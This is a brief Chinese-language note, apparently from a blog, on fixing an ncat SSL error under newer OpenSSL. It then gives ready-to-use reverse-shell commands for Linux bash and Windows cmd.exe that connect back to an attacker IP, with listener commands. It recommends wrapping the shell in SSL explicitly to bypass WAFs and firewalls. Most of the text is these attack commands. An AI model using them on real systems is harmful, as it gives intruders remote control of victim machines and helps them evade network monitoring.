Ncat: ssl_gen_cert(): error:03000098:digital envelope routines::invalid digest. QUITTING.
原因是新版本openssl sha1不支持了
需要设置环境变量:export OPENSSL_ENABLE_SHA1_SIGNATURES=1
参考:https://github.com/dotnet/runtime/issues/65874
另外如果ncat反弹shell不完整,没有显示全命令提示符,可以加-i参数。还可以加上–ssl参数进行加密绕过waf:
victim> ncat <ip> <port,eg.443> --ssl -c "bash -i 2>&1"
attacker> ncat -l <port,eg.443> --ssl
victim
ncat.exe <Attacker_IP> <PORT> -e "cmd.exe /c (cmd.exe 2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe 2>&1)"
attacker
ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl